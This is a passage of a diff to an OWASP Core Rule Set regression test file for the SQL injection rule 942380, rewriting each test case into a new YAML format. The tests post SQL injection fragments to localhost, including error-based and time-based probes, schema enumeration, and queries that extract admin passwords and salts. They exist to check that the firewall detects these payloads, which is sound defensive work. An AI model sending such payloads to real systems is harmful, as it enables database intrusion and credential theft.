text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-45 + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ORder by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ordeR by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute php" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Execute(" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + 